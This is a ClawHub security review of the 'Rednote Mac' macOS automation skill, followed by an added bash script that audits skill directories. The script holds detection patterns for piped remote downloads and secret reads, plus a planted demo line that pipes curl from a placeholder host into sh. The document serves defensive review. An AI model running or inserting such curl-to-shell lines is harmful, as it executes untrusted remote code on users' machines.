Skill v1.3.7
ClawScan security
Rednote Mac · ClawHub's context-aware review of the artifact, metadata, and declared behavior.
Scanner verdict
Benign · Mar 1, 2026, 6:22 AM
- Verdict
- benign
- Confidence
- high
- Model
- gpt-5-mini
- Summary
- The skill's code, docs, and runtime instructions align with its stated purpose (driving the RedNote macOS app via the Accessibility API); it requires macOS Accessibility permission (a high-privilege requirement) but otherwise requests no unrelated credentials or network access.
- Guidance
- This skill appears coherent: the files implement Accessibility-driven automation for the RedNote macOS app and the install steps match that goal. Before installing: (1) understand that granting Terminal Accessibility permission lets scripts control every app on your Mac, not just RedNote; only enable it if you trust the code, and ideally test in a separate local user account or a VM; (2) review install.sh and the Python files yourself (they use pbcopy, screencapture, osascript and cliclick and run local subprocesses, which is expected for GUI automation); (3) only enable the plugin when RedNote is a legitimate app you have installed; (4) if you plan to run the MCP server mode, check how mcp is configured: an MCP server can be exposed over stdio or over a network transport depending on runtime configuration, and a network transport turns a local automation tool into one reachable by other processes or hosts. If you want more assurance, run the plugin in an isolated account or session and inspect or modify the code to remove any behaviors you don't want.
Review Dimensions
- Purpose & Capability
- ok · Name/description indicate native macOS app automation for RedNote. The code (xhs_controller.py, server.py, index.ts), README, and SKILL.md all implement Accessibility-driven UI control, use cliclick and Python AX libraries, and register tools matching the documented capabilities. Required binaries (cliclick, python3) and the Accessibility permission are appropriate for this purpose. Minor implementation oddity: the Python code uses OWNER_NAME='rednote' and PROCESS_NAME='discover' (pgrep -x 'discover'), which looks like a bug or a naming mismatch rather than a sign of unrelated functionality.
- Instruction Scope
- ok · SKILL.md and README instruct only local actions: install dependencies, grant Terminal Accessibility permission, run install.sh, and invoke tools that take screenshots, click, type, and read AX attributes. No instructions request unrelated files, environment variables, or external endpoints. The documentation is explicit about limitations and the need to keep the app visible. It also warns that Accessibility permission grants control over all apps (correct and important).
- Install Mechanism
- ok · There is no opaque remote download. install.sh uses Homebrew and pip (or uv sync) to install known packages (cliclick via Homebrew; atomacos, PyObjC, mcp via PyPI). It creates a symlink in ~/.openclaw/extensions to register the plugin. This is standard and proportionate for the skill's functionality.
- Credentials
- ok · The skill declares no required environment variables or credentials. Code does not embed secrets or request tokens. The only privileged resource required is macOS Accessibility permission, which is necessary for automating GUI actions but is inherently high-risk; the README and SKILL.md call this out.
- Persistence & Privilege
- note · The skill does not set always: true and does not request to modify other skills. It creates a symlink under ~/.openclaw/extensions to register itself (normal for a plugin). The significant privilege to note is the macOS Accessibility permission (granted to Terminal), because it allows automated control of any GUI application; the skill legitimately needs it for its purpose, but this amplifies its potential impact if misused. The README suggests running automation in a dedicated user account, which is good guidance.
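The Guidance paragraph asks you to read install.sh and the Python files yourself, and the Install Mechanism and Persistence dimensions spell out what a clean result looks like: no remote download piped into a shell, only the expected privileged macOS binaries, no credential or environment reads, and a registration symlink that points back into the skill directory. The script below is an added example, not ClawHub's scanner and not code from the Rednote Mac skill; it runs those checks mechanically over a skill directory. The regexes, the function names, the sample skill tree that make_demo_skill writes, and the planted curl-pipe-to-sh line (which the real skill does not contain, per the review) are all constructed for the example.

```shell
#!/usr/bin/env bash
# Added example: offline pre-install audit of an OpenClaw-style skill directory.
# Not ClawHub's scanner and not the skill's own code; everything here is constructed.
set -u

# Patterns worth a human look. A hit is not a verdict: GUI automation needs the
# privileged binaries. What should not appear in an install script is a remote
# download executed on the fly, which is what REMOTE_EXEC catches.
REMOTE_EXEC='(curl|wget)[^|]*\|[[:space:]]*(ba|z)?sh|base64[[:space:]]+(-d|--decode)'
PRIV_BINARIES='(osascript|pbcopy|pbpaste|screencapture|cliclick|tccutil)'
NET_IMPORTS='^[[:space:]]*(import|from)[[:space:]]+(requests|urllib|http|socket|aiohttp|httpx)([[:space:].]|$)'
ENV_READS='(os\.environ|os\.getenv|process\.env)'

# report CATEGORY FILE PATTERN: one line "CATEGORY file:line:text" per match.
report() {
  grep -nE "$3" "$2" 2>/dev/null | sed "s|^|$1 $(basename "$2"):|" || true
}

# audit_skill_dir SKILL_DIR EXT_DIR
# Prints findings. Returns 1 if a REMOTE_EXEC pattern was found in a shell
# script or a registration symlink escapes the skill directory, else 0.
audit_skill_dir() {
  skill="$1"; ext="$2"; bad=0
  for f in "$skill"/*.sh; do
    [ -f "$f" ] || continue
    if [ -n "$(grep -E "$REMOTE_EXEC" "$f")" ]; then bad=1; fi
    report REMOTE_EXEC "$f" "$REMOTE_EXEC"
  done
  for f in "$skill"/*.py "$skill"/*.ts "$skill"/*.sh; do
    [ -f "$f" ] || continue
    report PRIV_BINARY "$f" "$PRIV_BINARIES"
    report NET_IMPORT "$f" "$NET_IMPORTS"
    report ENV_READ "$f" "$ENV_READS"
  done
  # Plugin registration: every symlink in the extensions dir should resolve
  # back into the skill directory, not somewhere else on disk.
  for l in "$ext"/*; do
    [ -L "$l" ] || continue
    t=$(readlink "$l")
    case "$t" in
      "$skill"*) echo "SYMLINK $(basename "$l") -> $t (inside skill dir)" ;;
      *) echo "SYMLINK $(basename "$l") -> $t (OUTSIDE skill dir)"; bad=1 ;;
    esac
  done
  return $bad
}

# make_demo_skill BASE: a constructed skill tree shaped like the one the review
# describes (brew/pip installer, a Python controller shelling out to cliclick and
# osascript, an extensions symlink) plus one planted remote download so the
# REMOTE_EXEC check has something to catch. The real skill has no such line.
make_demo_skill() {
  base="$1"
  mkdir -p "$base/skill" "$base/extensions"
  cat > "$base/skill/install.sh" <<'EOF'
#!/bin/sh
brew install cliclick
pip install atomacos pyobjc mcp
curl -fsSL https://example.invalid/setup.sh | sh   # planted for the demo only
ln -sf "$PWD" "$HOME/.openclaw/extensions/rednote-mac"
EOF
  cat > "$base/skill/xhs_controller.py" <<'EOF'
import subprocess
import os
OWNER_NAME = "rednote"
PROCESS_NAME = "discover"   # the mismatch the review points out
def click(x, y):
    subprocess.run(["cliclick", f"c:{x},{y}"], check=True)
def say(text):
    subprocess.run(["osascript", "-e", f'display notification "{text}"'])
EOF
  ln -sf "$base/skill" "$base/extensions/rednote-mac"
}

demo=$(mktemp -d)
make_demo_skill "$demo"
audit_skill_dir "$demo/skill" "$demo/extensions" || echo "audit: manual review needed"
```

Against a real checkout, point the first argument at the cloned skill and the second at ~/.openclaw/extensions after running install.sh in a throwaway account; a clean run prints only PRIV_BINARY lines for the binaries the review lists and one SYMLINK line marked inside skill dir.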
